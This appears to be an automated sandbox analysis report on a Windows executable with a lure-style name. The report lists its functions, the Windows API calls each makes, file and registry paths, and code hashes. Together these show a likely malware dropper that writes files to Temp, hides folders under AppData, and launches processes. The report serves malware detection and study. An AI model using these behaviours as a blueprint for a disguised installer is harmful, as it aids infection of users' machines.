                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll

                                                                                      Control-flow Graph (first basic block: 404e89-404e9e)
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                                                      • lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8), ref: 00404EE5
                                                                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll), ref: 00404EF7
                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll

                                                                                      Control-flow Graph (first basic block: 402e6c-402e82)
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402ECE
                                                                                      • GetTickCount.KERNEL32 ref: 00402F55
                                                                                      • MulDiv.KERNEL32(7FFFFFFF,?,00000020), ref: 00402F82
                                                                                      • wsprintfA.USER32 ref: 00402F92
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,007904A8,7FFFFFFF,00000000), ref: 00402FC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CountTick$FileWritewsprintf
                                                                                      • String ID: ... %d%%

                                                                                      Control-flow Graph (first basic block: 40231a-402360)
                                                                                      APIs
                                                                                      • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402358
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw1382.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402378
                                                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw1382.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B1
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw1382.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsw1382.tmp

                                                                                      Control-flow Graph (first basic block: 4015b3-4015c6)
                                                                                      APIs
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(?,?,Grundsprogs.but,?,0040572E,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410,00000000), ref: 004056D0
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056D5
                                                                                        • Part of subcall function 004056C2: CharNextA.USER32(00000000), ref: 004056E9
                                                                                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015DB
                                                                                      • GetLastError.KERNEL32(?,00000000,?,00000000,?), ref: 004015E5
                                                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,?,00000000,?), ref: 004015F3
                                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging,00000000,00000000,?), ref: 00401622
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging, xrefs: 00401617
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging
                                                                                      • API String ID: 3751793516-2495297767
                                                                                      • Opcode ID: abddc800633dd95d775d80f783ae593f51e4c76b4448ee96aca239786a011afb
                                                                                      • Instruction ID: f6d043a697dbba063d8ca4a6451cbbc07de469f39b9323e3bb4b0ee781e04bf7
                                                                                      • Opcode Fuzzy Hash: abddc800633dd95d775d80f783ae593f51e4c76b4448ee96aca239786a011afb
                                                                                      • Instruction Fuzzy Hash: 9F115531908140ABDB207F745C04DBF3BB0EA66366724073FF491B22E2C63C0942862E
                                                                                      APIs
                                                                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD3
                                                                                        • Part of subcall function 10001A86: GlobalFree.KERNEL32(?), ref: 10001CD8
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001785
                                                                                      • FreeLibrary.KERNEL32(?), ref: 100017FC
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001821
                                                                                        • Part of subcall function 10002165: GlobalAlloc.KERNEL32(?,8A470175), ref: 10002197
                                                                                        • Part of subcall function 10002540: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,10001756,00000000), ref: 100025B2
                                                                                        • Part of subcall function 10001576: lstrcpyA.KERNEL32(00000000,?,00000000,100016B2,00000000), ref: 1000158F
                                                                                        • Part of subcall function 1000236D: wsprintfA.USER32 ref: 100023D2
                                                                                        • Part of subcall function 1000236D: GlobalFree.KERNEL32(?), ref: 1000248E
                                                                                        • Part of subcall function 1000236D: GlobalFree.KERNEL32(00000000), ref: 100024B7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1767494692-3916222277
                                                                                      • Opcode ID: 0952c09c6252a8ba46cc4746145f3c2b250c4692183d3e2bc8c66cf4bd3bffc0
                                                                                      • Instruction ID: a4822a2f56843d2abdfa94b6917cafe90cab4d4c428c41a0756c8854a89f2b82
                                                                                      • Opcode Fuzzy Hash: 0952c09c6252a8ba46cc4746145f3c2b250c4692183d3e2bc8c66cf4bd3bffc0
                                                                                      • Instruction Fuzzy Hash: 3131AD759046059AFB41EF249CC9BDA37ECFF052D0F00C029FA09AA09EDF7499458BA0
                                                                                      APIs
                                                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                                                                      • Instruction ID: 12ae1f52ecf524c97be6b8063d2fdb139482407b097923a357ceac7fbdf5fe65
                                                                                      • Opcode Fuzzy Hash: 3698ce71db31f8b469170a2b9811606ddb50db903b10dbb8916321b005f99d26
                                                                                      • Instruction Fuzzy Hash: 43219271A44248AFEF01AFB4CD8AAAE7FB5EF44348F14443EF501B61E1D6B95940DB18
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,?), ref: 00401F93
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                                                        • Part of subcall function 00404E89: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8), ref: 00404EE5
                                                                                        • Part of subcall function 00404E89: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll), ref: 00404EF7
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                                                      • LoadLibraryExA.KERNELBASE(00000000,?,?,00000001,?), ref: 00401FA3
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                      • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040201D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 2987980305-0
                                                                                      • Opcode ID: bdca3eef77b93f5fb18ef256b874c04e122c56b6ebb898da6ec56c274ac8ae3c
                                                                                      • Instruction ID: 5603d6e3752352f3426b9f4474974a0af609082b15338ddd0508423665d33cd5
                                                                                      • Opcode Fuzzy Hash: bdca3eef77b93f5fb18ef256b874c04e122c56b6ebb898da6ec56c274ac8ae3c
                                                                                      • Instruction Fuzzy Hash: B3210072D04315ABCF207F64CE49A6F79B0AF45358F20423BF601B62D1D7BD49419A5E
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024ED
                                                                                      • WriteFile.KERNELBASE(00000000,?,C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250C
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll, xrefs: 004024DB, 00402500
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWritelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll
                                                                                      • API String ID: 427699356-1718671170
                                                                                      • Opcode ID: f563f17a0cef2154c02f78be3d8b886d91b2262862f67175609af4916b2f3259
                                                                                      • Instruction ID: 6a42f5992006efeb6b2b1e3b7836ad9eb28beba8801b06696a3c4cf9cb3ed08d
                                                                                      • Opcode Fuzzy Hash: f563f17a0cef2154c02f78be3d8b886d91b2262862f67175609af4916b2f3259
                                                                                      • Instruction Fuzzy Hash: ADF0E272A44241BFDB00EBA09E4AAAF7768DB01308F10843FB101F50C2D5FC9A41AB2D
                                                                                      APIs
                                                                                      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 00405371
                                                                                      • CloseHandle.KERNEL32(?), ref: 0040537E
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 0040535F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                                                                      • Instruction ID: 6329997bd1e730a3a29e667b1e1522e50d9b382afe1a637a64c3b3c33ec2f19e
                                                                                      • Opcode Fuzzy Hash: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                                                                      • Instruction Fuzzy Hash: 28E0ECB4900209AFDB009F64DC09E6F7BBDFB00344F00CA21AD11E2150F778E9108EA9
                                                                                      APIs
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E3F
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E51
                                                                                        • Part of subcall function 00405DE7: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E61
                                                                                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 004030DC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 4115351271-1726532035
                                                                                      • Opcode ID: 989f0d5821f87d80d940d59544e2b08c282c9559bcd769a3462913332c2d97c9
                                                                                      • Instruction ID: a6bfa147a109cceda54d2a74a0b449bcdc81c0a47cb146117b691cb1a8044d63
                                                                                      • Opcode Fuzzy Hash: 989f0d5821f87d80d940d59544e2b08c282c9559bcd769a3462913332c2d97c9
                                                                                      • Instruction Fuzzy Hash: 96D09222516D3061D59132263C06FCF1A4D8F8A359F41817BF50A740854A6D1A9289FE
                                                                                      APIs
                                                                                        • Part of subcall function 00405E80: FindFirstFileA.KERNELBASE(?,007A0548,Grundsprogs.but,0040575A,Grundsprogs.but,Grundsprogs.but,00000000,Grundsprogs.but,Grundsprogs.but,?,?,773E3410,00405479,?,C:\Users\user\AppData\Local\Temp\,773E3410), ref: 00405E8B
                                                                                        • Part of subcall function 00405E80: FindClose.KERNEL32(00000000), ref: 00405E97
                                                                                      • lstrlenA.KERNEL32 ref: 004021C8
                                                                                      • lstrlenA.KERNEL32(00000000), ref: 004021D2
                                                                                      • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                      • String ID:
                                                                                      • API String ID: 1486964399-0
                                                                                      • Opcode ID: fe9920c73d653bb382b5488afb326a4be2307579c403581ffdf05e2a2fb699af
                                                                                      • Instruction ID: fea5999ed2d29f36f6659ea5ab76f630fbbff02e816614fbb945e9929dcefa88
                                                                                      • Opcode Fuzzy Hash: fe9920c73d653bb382b5488afb326a4be2307579c403581ffdf05e2a2fb699af
                                                                                      • Instruction Fuzzy Hash: 1D115271E04358AADB10EFB9C94999EB7F8EF04354F10853BA505FB2C2D6BDD9008B59
                                                                                      APIs
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EC2
                                                                                        • Part of subcall function 00404E89: lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ED2
                                                                                        • Part of subcall function 00404E89: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,00000000,007904A8,007898A8), ref: 00404EE5
                                                                                        • Part of subcall function 00404E89: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsw1382.tmp\System.dll), ref: 00404EF7
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F1D
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F37
                                                                                        • Part of subcall function 00404E89: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F45
                                                                                        • Part of subcall function 0040534C: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 00405371
                                                                                        • Part of subcall function 0040534C: CloseHandle.KERNEL32(?), ref: 0040537E
                                                                                      • WaitForSingleObject.KERNEL32(?,?,00000000,000000EB,00000000), ref: 00401E6C
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 3521207402-0
                                                                                      • Opcode ID: 25fd9c86a64d1daeba0e3da36de81919d2ae7ea6952b975f12a42877c509ddad
                                                                                      • Instruction ID: f18eb7332cf5c9122d10212b54beee47d15ecdde2804cc733f54deaeffad9b38
                                                                                      • Opcode Fuzzy Hash: 25fd9c86a64d1daeba0e3da36de81919d2ae7ea6952b975f12a42877c509ddad
                                                                                      • Instruction Fuzzy Hash: D2018031900118EBCF10AFA1CD859AE7B71EB00344F10817BFA01B51E1C7B95A81DF9E
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,00405CA8,00000000,00000002,?,00000002,?,?,00405CA8,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405A8C
                                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00405CA8,?,00405CA8), ref: 00405AAD
                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00405ACE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3677997916-0
                                                                                      • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                      • Instruction ID: 9c835cca2eb0aa0b02c586e78d8c0f4c8809676904daf451fb9b34ef674f496a
                                                                                      • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                                                                      • Instruction Fuzzy Hash: AD015A7154020AEFDF128F64EC84AEB3FACEF18354F044536F955A6260D235E964CFA5
                                                                                      APIs
                                                                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,000003E7,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                                                                      • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402466
                                                                                      • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 00402479
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw1382.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$CloseOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 167947723-0
                                                                                      • Opcode ID: e0a1bc4ab8869d2a121cb057061cf9ed2671c29535a9e67340b1f386ccbb16c1
                                                                                      • Instruction ID: d28fcdc599a7f9727bcbc73a1b2195d927587ee9f1dfd2233f1a348fd0a26dbd
                                                                                      • Opcode Fuzzy Hash: e0a1bc4ab8869d2a121cb057061cf9ed2671c29535a9e67340b1f386ccbb16c1
                                                                                      • Instruction Fuzzy Hash: AEF0F472A04205EFE7119F689E8CEBF7A6CEF40348F10483FF105B61C0D6B95E41962A
                                                                                      APIs
                                                                                        • Part of subcall function 00405805: GetFileAttributesA.KERNELBASE(?,?,0040541D,?,?,00000000,00405600,?,?,?,?), ref: 0040580A
                                                                                        • Part of subcall function 00405805: SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040581E
                                                                                      • RemoveDirectoryA.KERNEL32(?,?,?,00000000,00405600), ref: 0040542C
                                                                                      • DeleteFileA.KERNELBASE(?,?,?,00000000,00405600), ref: 00405434
                                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040544C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                      • String ID:
                                                                                      • API String ID: 1655745494-0
                                                                                      • Opcode ID: 7ce6c77110259a770026784a7bafc9becd511e2727126a845108ec838af216ef
                                                                                      • Instruction ID: 50574c3c0a793d880e57543bab2a7873921d7517d00327b94fd9c91dc08ced70
                                                                                      • Opcode Fuzzy Hash: 7ce6c77110259a770026784a7bafc9becd511e2727126a845108ec838af216ef
                                                                                      • Instruction Fuzzy Hash: FFE0E53150DA905AC310673089087DB2AD4DF86326F05493AF891B11D1C77848C68ABA
                                                                                      APIs
                                                                                      • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging,?), ref: 00401E1E
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging, xrefs: 00401E09
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ExecuteShell
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid\Urging
                                                                                      • API String ID: 587946157-2495297767
                                                                                      • Opcode ID: 6b82480460148eba8d5457b1b121f6af4dfa1a379e315f455fd24936478d9cf2
                                                                                      • Instruction ID: 65620240301e045641c79ca9780ea5e083df883982ed968680c53d4afc27f8c5
                                                                                      • Opcode Fuzzy Hash: 6b82480460148eba8d5457b1b121f6af4dfa1a379e315f455fd24936478d9cf2
                                                                                      • Instruction Fuzzy Hash: 43F0F672B041406ACB11ABB5DD8AE6D7BA4DB41318F24093BF150F71C2D9FD88419B18
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(?,?,00000001,?,?,?,00000002), ref: 00402563
                                                                                        • Part of subcall function 00405ADA: wsprintfA.USER32 ref: 00405AE7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FileReadwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3326442220-0
                                                                                      • Opcode ID: 071a9315f289c3058708434a5f56a74c9704623313ac53fb04275045a36301de
                                                                                      • Instruction ID: 59a9ffd24257c1493c6120c561a9136e4b4039c8ce9bef0c5d6aa76a01188804
                                                                                      • Opcode Fuzzy Hash: 071a9315f289c3058708434a5f56a74c9704623313ac53fb04275045a36301de
                                                                                      • Instruction Fuzzy Hash: 3421E470D05299FFDF219B948E685AEBB759B01304F14417BF481B62D2D6BC8A81C72D
                                                                                      APIs
                                                                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,000003E7,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F6
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw1382.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3677997916-0
                                                                                      • Opcode ID: b439f61bfe72f3706feb706b2374f9df9e561f3deb36810b4298d1c7e54b1251
                                                                                      • Instruction ID: 3a9a750c04b5dd3bf1d403560cac254c76a96e884aedd954fc1ce2650bea7c06
                                                                                      • Opcode Fuzzy Hash: b439f61bfe72f3706feb706b2374f9df9e561f3deb36810b4298d1c7e54b1251
                                                                                      • Instruction Fuzzy Hash: CE119E31905205EFDB15DF64CA889AFBBB4EF45344F20843FE446B62C0D2B85A41DB2A
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
